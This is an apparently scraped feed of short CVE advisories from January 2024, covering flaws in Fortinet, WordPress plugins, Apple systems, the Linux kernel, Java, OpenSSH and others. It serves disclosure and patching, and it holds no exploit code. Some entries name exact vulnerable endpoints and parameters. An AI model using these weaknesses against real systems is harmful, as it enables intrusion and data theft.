🚨 CVE-2023-44250An improper privilege management vulnerability [CWE-269] in a Fortinet FortiOS HA cluster version 7.4.0 through 7.4.1 and 7.2.5 and in a FortiProxy HA cluster version 7.4.0 through 7.4.1 allows an authenticated attacker to perform elevated actions via crafted HTTP or HTTPS requests.🎖@cveNotify |
|
| 2024-01-18 14:07:24 |
🚨 CVE-2023-37934An allocation of resources without limits or throttling vulnerability [CWE-770] in FortiPAM 1.0 all versions allows an authenticated attacker to perform a denial of service attack via sending crafted HTTP or HTTPS requests in a high frequency.🎖@cveNotify |
|
| 2024-01-18 13:37:27 |
🚨 CVE-2024-0669A Cross-Frame Scripting vulnerability has been found on Plone CMS affecting verssion below 6.0.5. An attacker could store a malicious URL to be opened by an administrator and execute a malicios iframe element.🎖@cveNotify |
|
| 2024-01-18 13:37:26 |
🚨 CVE-2024-0565An out-of-bounds memory read flaw was found in receive_encrypted_standard in fs/smb/client/smb2ops.c in the SMB Client sub-component in the Linux Kernel. This issue occurs due to integer underflow on the memcpy length, leading to a denial of service.🎖@cveNotify |
|
| 2024-01-18 13:37:25 |
🚨 CVE-2024-21667pimcore/customer-data-framework is the Customer Management Framework for management of customer data within Pimcore. An authenticated and unauthorized user can access the GDPR data extraction feature and query over the information returned, leading to customer data exposure. Permissions are not enforced when reaching the `/admin/customermanagementframework/gdpr-data/search-data-objects` endpoint allowing an authenticated user without the permissions to access the endpoint and query the data available there. An unauthorized user can access PII data from customers. This vulnerability has been patched in version 4.0.6.🎖@cveNotify |
|
| 2024-01-18 13:37:24 |
🚨 CVE-2024-21666The Customer Management Framework (CMF) for Pimcore adds functionality for customer data management, segmentation, personalization and marketing automation. An authenticated and unauthorized user can access the list of potential duplicate users and see their data. Permissions are enforced when reaching the `/admin/customermanagementframework/duplicates/list` endpoint allowing an authenticated user without the permissions to access the endpoint and query the data available there. Unauthorized user(s) can access PII data from customers. This vulnerability has been patched in version 4.0.6.🎖@cveNotify |
|
| 2024-01-18 12:37:25 |
🚨 CVE-2023-6816A flaw was found in X.Org server. Both DeviceFocusEvent and the XIQueryPointer reply contain a bit for each logical button currently down. Buttons can be arbitrarily mapped to any value up to 255, but the X.Org Server was only allocating space for the device's particular number of buttons, leading to a heap overflow if a bigger value was used.🎖@cveNotify |
|
| 2024-01-18 12:37:24 |
🚨 CVE-2024-23525The Spreadsheet::ParseXLSX package before 0.30 for Perl allows XXE attacks because it neglects to use the no_xxe option of XML::Twig.🎖@cveNotify |
|
| 2024-01-18 11:37:25 |
🚨 CVE-2023-51464Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-01-18 11:37:24 |
🚨 CVE-2023-51463Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2024-01-18 09:37:24 |
🚨 CVE-2024-0580Omission of user-controlled key authorization in the IDMSistemas platform, affecting the QSige product. This vulnerability allows an attacker to extract sensitive information from the API by making a request to the parameter '/qsige.locator/quotePrevious/centers/X', where X supports values 1,2,3, etc.🎖@cveNotify |
|
| 2024-01-18 08:37:25 |
🚨 CVE-2024-0381The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the use of the 'tag' attribute in the wprm-recipe-name, wprm-recipe-date, and wprm-recipe-counter shortcodes in all versions up to, and including, 9.1.0. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-01-18 08:37:24 |
🚨 CVE-2023-6958The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-01-18 05:37:24 |
🚨 CVE-2023-6816A flaw was found in X.Org server. Both DeviceFocusEvent and the XIQueryPointer reply contain a bit for each logical button currently down. Buttons can be arbitrarily mapped to any value up to 255, but the X.Org Server was only allocating space for the device's particular number of buttons, leading to a heap overflow if a bigger value was used.🎖@cveNotify |
|
| 2024-01-18 03:37:26 |
🚨 CVE-2023-48795The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust.🎖@cveNotify |
|
| 2024-01-18 03:37:25 |
🚨 CVE-2023-40889A heap-based buffer overflow exists in the qr_reader_match_centers function of ZBar 0.23.90. Specially crafted QR codes may lead to information disclosure and/or arbitrary code execution. To trigger this vulnerability, an attacker can digitally input the malicious QR code, or prepare it to be physically scanned by the vulnerable scanner.🎖@cveNotify |
|
| 2024-01-18 03:37:24 |
🚨 CVE-2022-41717An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.🎖@cveNotify |
|
| 2024-01-18 01:37:25 |
🚨 CVE-2024-0651A vulnerability was found in PHPGurukul Company Visitor Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file search-visitor.php. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251377 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-18 01:37:24 |
🚨 CVE-2021-4433A vulnerability was found in Karjasoft Sami HTTP Server 2.0. It has been classified as problematic. Affected is an unknown function of the component HTTP HEAD Rrequest Handler. The manipulation leads to denial of service. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250836.🎖@cveNotify |
|
| 2024-01-18 00:37:24 |
🚨 CVE-2023-6340SonicWall Capture Client version 3.7.10, NetExtender client version 10.2.337 and earlier versions are installed with sfpmonitor.sys driver. The driver has been found to be vulnerable to Denial-of-Service (DoS) caused by Stack-based Buffer Overflow vulnerability.🎖@cveNotify |
|
| 2024-01-17 23:37:24 |
🚨 CVE-2024-0648A vulnerability has been found in Yunyou CMS up to 2.2.6 and classified as critical. This vulnerability affects unknown code of the file /app/index/controller/Common.php. The manipulation of the argument templateFile leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251374 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-17 23:07:25 |
🚨 CVE-2022-4958A vulnerability classified as problematic has been found in qkmc-rk redbbs 1.0. Affected is an unknown function of the component Post Handler. The manipulation of the argument title leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250236.🎖@cveNotify |
|
| 2024-01-17 23:07:24 |
🚨 CVE-2023-7070The Email Encoder – Protect Email Addresses and Phone Numbers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's eeb_mailto shortcode in all versions up to, and including, 2.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-01-17 22:37:32 |
🚨 CVE-2023-7019The LightStart – Maintenance Mode, Coming Soon and Landing Page Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the insert_template function in all versions up to, and including, 2.6.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to change page designs.🎖@cveNotify |
|
| 2024-01-17 22:37:25 |
🚨 CVE-2023-28185An integer overflow was addressed through improved input validation. This issue is fixed in tvOS 16.4, macOS Big Sur 11.7.5, iOS 16.4 and iPadOS 16.4, watchOS 9.4, macOS Monterey 12.6.4, iOS 15.7.4 and iPadOS 15.7.4. An app may be able to cause a denial-of-service.🎖@cveNotify |
|
| 2024-01-17 22:37:24 |
🚨 CVE-2023-51127FLIR AX8 thermal sensor cameras up to and including 1.46.16 are vulnerable to Directory Traversal due to improper access restriction. This vulnerability allows an unauthenticated, remote attacker to obtain arbitrary sensitive file contents by uploading a specially crafted symbolic link file.🎖@cveNotify |
|
| 2024-01-17 22:07:32 |
🚨 CVE-2023-52027TOTOlink A3700R v9.1.2u.5822_B20200513 was discovered to contain a remote command execution (RCE) vulnerability via the NTPSyncWithHost function.🎖@cveNotify |
|
| 2024-01-17 22:07:25 |
🚨 CVE-2023-4246The GiveWP plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.33.3. This is due to missing or incorrect nonce validation on the give_sendwp_remote_install_handler function. This makes it possible for unauthenticated attackers to install and activate the SendWP plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-01-17 22:07:24 |
🚨 CVE-2023-37644SWFTools 0.9.2 772e55a allows attackers to trigger a large memory-allocation attempt via a crafted document, as demonstrated by pdf2swf. This occurs in png_read_chunk in lib/png.c.🎖@cveNotify |
|
| 2024-01-17 21:07:32 |
🚨 CVE-2023-42865An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Ventura 13.3, tvOS 16.4, iOS 16.4 and iPadOS 16.4, watchOS 9.4. Processing an image may result in disclosure of process memory.🎖@cveNotify |
|
| 2024-01-17 21:07:26 |
🚨 CVE-2023-42862An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Ventura 13.3, tvOS 16.4, iOS 16.4 and iPadOS 16.4, watchOS 9.4. Processing an image may result in disclosure of process memory.🎖@cveNotify |
|
| 2024-01-17 21:07:25 |
🚨 CVE-2023-42830A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Ventura 13.3, iOS 16.4 and iPadOS 16.4. An app may be able to read sensitive location information.🎖@cveNotify |
|
| 2024-01-17 21:07:24 |
🚨 CVE-2023-41075A type confusion issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.7.5, macOS Ventura 13.3, iOS 16.4 and iPadOS 16.4, iOS 15.7.4 and iPadOS 15.7.4, macOS Monterey 12.6.4. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2024-01-17 20:37:42 |
🚨 CVE-2023-44077Studio Network Solutions ShareBrowser before 7.0 on macOS mishandles signature verification, aka PMP-2636.🎖@cveNotify |
|
| 2024-01-17 20:37:41 |
🚨 CVE-2016-20021In Gentoo Portage before 3.0.47, there is missing PGP validation of executed code: the standalone emerge-webrsync downloads a .gpgsig file but does not perform signature verification. Unless emerge-webrsync is used, Portage is not vulnerable.🎖@cveNotify |
|
| 2024-01-17 20:37:37 |
🚨 CVE-2023-6558The Export and Import Users and Customers plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'upload_import_file' function in versions up to, and including, 2.4.8. This makes it possible for authenticated attackers with shop manager-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-01-17 20:37:36 |
🚨 CVE-2023-6316The MW WP Form plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the '_single_file_upload' function in versions up to, and including, 5.0.1. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-01-17 20:37:31 |
🚨 CVE-2023-48252The vulnerability allows an authenticated remote attacker to perform actions exceeding their authorized access via crafted HTTP requests.🎖@cveNotify |
|
| 2024-01-17 20:37:30 |
🚨 CVE-2023-48251The vulnerability allows a remote attacker to authenticate to the SSH service with root privileges through a hidden hard-coded account.🎖@cveNotify |
|
| 2024-01-17 20:07:25 |
🚨 CVE-2023-6220The Piotnet Forms plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'piotnetforms_ajax_form_builder' function in versions up to, and including, 1.0.26. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-01-17 20:07:24 |
🚨 CVE-2023-5504The BackWPup plugin for WordPress is vulnerable to Directory Traversal in versions up to, and including, 4.0.1 via the Log File Folder. This allows authenticated attackers to store backups in arbitrary folders on the server provided they can be written to by the server. Additionally, default settings will place an index.php and a .htaccess file into the chosen directory (unless already present) when the first backup job is run that are intended to prevent directory listing and file access. This means that an attacker could set the backup directory to the root of another site in a shared environment and thus disable that site.🎖@cveNotify |
|
| 2024-01-17 19:37:26 |
🚨 CVE-2022-41790Missing Authorization vulnerability in CodePeople WP Time Slots Booking Form.This issue affects WP Time Slots Booking Form: from n/a through 1.1.76.🎖@cveNotify |
|
| 2024-01-17 19:37:25 |
🚨 CVE-2023-40529This issue was addressed with improved redaction of sensitive information. This issue is fixed in iOS 17 and iPadOS 17. A person with physical access to a device may be able to use VoiceOver to access private calendar information.🎖@cveNotify |
|
| 2024-01-17 19:37:24 |
🚨 CVE-2023-40439A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in iOS 16.6 and iPadOS 16.6, macOS Ventura 13.5. An app may be able to read sensitive location information.🎖@cveNotify |
|
| 2024-01-17 19:07:32 |
🚨 CVE-2023-6583The Import and export users and customers plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.24.2 via the Recurring Import functionality. This makes it possible for authenticated attackers, with administrator access and above, to read and delete the contents of arbitrary files on the server including wp-config.php, which can contain sensitive information.🎖@cveNotify |
|
| 2024-01-17 19:07:26 |
🚨 CVE-2023-6582The ElementsKit Elementor addons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0.3 via the ekit_widgetarea_content function. This makes it possible for unauthenticated attackers to obtain contents of posts in draft, private or pending review status that should not be visible to the general public. This applies to posts created with Elementor only.🎖@cveNotify |
|
| 2024-01-17 19:07:25 |
🚨 CVE-2023-40437A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in iOS 16.6 and iPadOS 16.6, macOS Ventura 13.5. An app may be able to read sensitive location information.🎖@cveNotify |
|
| 2024-01-17 19:07:24 |
🚨 CVE-2023-40433A logic issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.3. An app may bypass Gatekeeper checks.🎖@cveNotify |
|
| 2024-01-17 18:37:33 |
🚨 CVE-2022-42839This issue was addressed with improved redaction of sensitive information. This issue is fixed in iOS 16.2 and iPadOS 16.2, macOS Ventura 13.1. An app may be able to read sensitive location information.🎖@cveNotify |
|
| 2024-01-17 18:37:26 |
🚨 CVE-2022-42816A logic issue was addressed with improved state management. This issue is fixed in macOS Ventura 13. An app may be able to modify protected parts of the file system.🎖@cveNotify |
|
| 2024-01-17 18:37:25 |
🚨 CVE-2023-46712A improper access control in Fortinet FortiPortal version 7.0.0 through 7.0.6, Fortinet FortiPortal version 7.2.0 through 7.2.1 allows attacker to escalate its privilege via specifically crafted HTTP requests.🎖@cveNotify |
|
| 2024-01-17 18:07:32 |
🚨 CVE-2022-47965The issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2024-01-17 18:07:26 |
🚨 CVE-2022-47915The issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2024-01-17 18:07:25 |
🚨 CVE-2023-5376An Improper Authentication vulnerability in Korenix JetNet TFTP allows abuse of this service. This issue affects JetNet devices older than firmware version 2024/01.🎖@cveNotify |
|
| 2024-01-17 18:07:24 |
🚨 CVE-2023-5347An Improper Verification of Cryptographic Signature vulnerability in the update process of Korenix JetNet Series allows replacing the whole operating system including Trusted Executables. This issue affects JetNet devices older than firmware version 2024/01.🎖@cveNotify |
|
| 2024-01-17 17:37:42 |
🚨 CVE-2024-0645Buffer overflow vulnerability in Explorer++ affecting version 1.3.5.531. A local attacker could execute arbitrary code via a long filename argument by monitoring Structured Exception Handler (SEH) records.🎖@cveNotify |
|
| 2024-01-17 17:37:35 |
🚨 CVE-2023-41056Redis is an in-memory database that persists on disk. Redis incorrectly handles resizing of memory buffers which can result in integer overflow that leads to heap overflow and potential remote code execution. This issue has been patched in version 7.0.15 and 7.2.4.🎖@cveNotify |
|
| 2024-01-17 17:37:34 |
🚨 CVE-2023-6158The EventON - WordPress Virtual Event Calendar Plugin plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on the evo_eventpost_update_meta function in all versions up to, and including, 4.5.4 (for Pro) and 2.2.7 (for free). This makes it possible for unauthenticated attackers to update and remove arbitrary post metadata. Note that certain parameters may allow for content injection.🎖@cveNotify |
|
| 2024-01-17 17:37:30 |
🚨 CVE-2024-20715Adobe Substance 3D Stager versions 2.1.3 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-01-17 17:37:29 |
🚨 CVE-2024-20656Visual Studio Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-01-17 17:07:24 |
🚨 CVE-2024-20653Microsoft Common Log File System Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-01-17 16:37:39 |
🚨 CVE-2024-0646An out-of-bounds memory write flaw was found in the Linux kernel’s Transport Layer Security functionality in how a user calls a function splice with a ktls socket as the destination. This flaw allows a local user to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2024-01-17 16:37:38 |
🚨 CVE-2024-0639A denial of service vulnerability due to a deadlock was found in sctp_auto_asconf_init in net/sctp/socket.c in the Linux kernel’s SCTP subsystem. This flaw allows guests with local user privileges to trigger a deadlock and potentially crash the system.🎖@cveNotify |
|
| 2024-01-17 16:37:34 |
🚨 CVE-2023-34379Missing Authorization vulnerability in MagneticOne Cart2Cart: Magento to WooCommerce Migration.This issue affects Cart2Cart: Magento to WooCommerce Migration: from n/a through 2.0.0.🎖@cveNotify |
|
| 2024-01-17 16:37:33 |
🚨 CVE-2022-36418Missing Authorization vulnerability in Vagary Digital HREFLANG Tags Lite.This issue affects HREFLANG Tags Lite: from n/a through 2.0.0.🎖@cveNotify |
|
| 2024-01-17 15:37:42 |
🚨 CVE-2023-47861A cross-site scripting (xss) vulnerability exists in the channelBody.php user name functionality of WWBN AVideo 11.6 and dev master commit 15fed957fb. A specially crafted HTTP request can lead to arbitrary Javascript execution. An attacker can get a user to visit a webpage to trigger this vulnerability.🎖@cveNotify |
|
| 2024-01-17 15:37:41 |
🚨 CVE-2023-45139fontTools is a library for manipulating fonts, written in Python. The subsetting module has a XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains a SVG table, is parsed. This allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system. This vulnerability has been patched in version 4.43.0.🎖@cveNotify |
|
| 2024-01-17 15:37:40 |
🚨 CVE-2023-38022An issue was discovered in Fortanix EnclaveOS Confidential Computing Manager (CCM) Platform before 3.29 for Intel SGX. Insufficient pointer validation allows a local attacker to access unauthorized information. This relates to strlen and sgx_is_within_user.🎖@cveNotify |
|
| 2024-01-17 15:37:36 |
🚨 CVE-2023-21843Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Sound). Supported versions that are affected are Oracle Java SE: 8u351, 8u351-perf, 11.0.17, 17.0.5, 19.0.1; Oracle GraalVM Enterprise Edition: 20.3.8, 21.3.4 and 22.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2024-01-17 15:37:35 |
🚨 CVE-2022-42920Apache Commons BCEL has a number of APIs that would normally only allow changing specific class characteristics. However, due to an out-of-bounds writing issue, these APIs can be used to produce arbitrary bytecode. This could be abused in applications that pass attacker-controllable data to those APIs, giving the attacker more control over the resulting bytecode than otherwise expected. Update to Apache Commons BCEL 6.6.0.🎖@cveNotify |
|
| 2024-01-17 15:37:31 |
🚨 CVE-2022-21628Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Lightweight HTTP Server). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2024-01-17 15:37:30 |
🚨 CVE-2022-21619Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2024-01-17 15:37:26 |
🚨 CVE-2022-21549Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 17.0.3.1; Oracle GraalVM Enterprise Edition: 21.3.2 and 22.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2024-01-17 15:37:25 |
🚨 CVE-2022-34169The Apache Xalan Java XSLT library is vulnerable to an integer truncation issue when processing malicious XSLT stylesheets. This can be used to corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java bytecode. Users are recommended to update to version 2.7.3 or later. Note: Java runtimes (such as OpenJDK) include repackaged copies of Xalan.🎖@cveNotify |
|
| 2024-01-17 15:07:32 |
🚨 CVE-2023-5376An Improper Authentication vulnerability in Korenix JetNet TFTP allows abuse of this service. This issue affects JetNet devices older than firmware version 2024/01.🎖@cveNotify |
|
| 2024-01-17 15:07:26 |
🚨 CVE-2023-5347An Improper Verification of Cryptographic Signature vulnerability in the update process of Korenix JetNet Series allows replacing the whole operating system including Trusted Executables. This issue affects JetNet devices older than firmware version 2024/01.🎖@cveNotify |
|
| 2024-01-17 15:07:25 |
🚨 CVE-2017-14027A Use of Hard-coded Credentials issue was discovered in Korenix JetNet JetNet5018G version 1.4, JetNet5310G version 1.4a, JetNet5428G-2G-2FX version 1.4, JetNet5628G-R version 1.4, JetNet5628G version 1.4, JetNet5728G-24P version 1.4, JetNet5828G version 1.1d, JetNet6710G-HVDC version 1.1e, and JetNet6710G version 1.1. The software uses undocumented hard-coded credentials that may allow an attacker to gain remote access.🎖@cveNotify |
|
| 2024-01-17 15:07:24 |
🚨 CVE-2017-14021A Use of Hard-coded Cryptographic Key issue was discovered in Korenix JetNet JetNet5018G version 1.4, JetNet5310G version 1.4a, JetNet5428G-2G-2FX version 1.4, JetNet5628G-R version 1.4, JetNet5628G version 1.4, JetNet5728G-24P version 1.4, JetNet5828G version 1.1d, JetNet6710G-HVDC version 1.1e, and JetNet6710G version 1.1. An attacker may gain access to hard-coded certificates and private keys allowing the attacker to perform man-in-the-middle attacks.🎖@cveNotify |
|
| 2024-01-17 14:37:25 |
🚨 CVE-2024-0643Unrestricted upload of dangerous file types in the C21 Live Encoder and Live Mosaic product, version 5.3. This vulnerability allows a remote attacker to upload different file extensions without any restrictions, resulting in a full system compromise.🎖@cveNotify |
|
| 2024-01-17 14:37:24 |
🚨 CVE-2024-0642Inadequate access control in the C21 Live Encoder and Live Mosaic product, version 5.3. This vulnerability allows a remote attacker to access the application as an administrator user through the application endpoint, due to lack of proper credential management.🎖@cveNotify |
|
| 2024-01-17 14:07:35 |
🚨 CVE-2023-46952Cross Site Scripting vulnerability in ABO.CMS v.5.9.3 allows an attacker to execute arbitrary code via a crafted payload to the Referer header.🎖@cveNotify |
|
| 2024-01-17 14:07:29 |
🚨 CVE-2023-36235An issue in webkul qloapps before v1.6.0 allows an attacker to obtain sensitive information via the id_order parameter.🎖@cveNotify |
|
| 2024-01-17 14:07:28 |
🚨 CVE-2023-49515Insecure Permissiosn vulnerability in TP Link TC70 and C200 WIFI Camera v.3 firmware v.1.3.4 and fixed in v.1.3.11 allows a physically proximate attacker to obtain sensitive information via a connection to the UART pin components.🎖@cveNotify |
|
| 2024-01-17 14:07:27 |
🚨 CVE-2023-49471Blind Server-Side Request Forgery (SSRF) vulnerability in karlomikus Bar Assistant before version 3.2.0 does not validate a parameter before making a request through Image::make(), which could allow authenticated remote attackers to execute arbitrary code.🎖@cveNotify |
|
| 2024-01-17 13:37:24 |
🚨 CVE-2023-49394Zentao versions 4.1.3 and before has a URL redirect vulnerability, which prevents the system from functioning properly.🎖@cveNotify |
|
| 2024-01-17 09:37:24 |
🚨 CVE-2021-4434The Social Warfare plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 3.5.2 via the 'swp_url' parameter. This allows attackers to execute code on the server.🎖@cveNotify |
|
| 2024-01-17 08:37:32 |
🚨 CVE-2023-51738This vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Network Name (SSID) parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system.Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.🎖@cveNotify |
|
| 2024-01-17 08:37:25 |
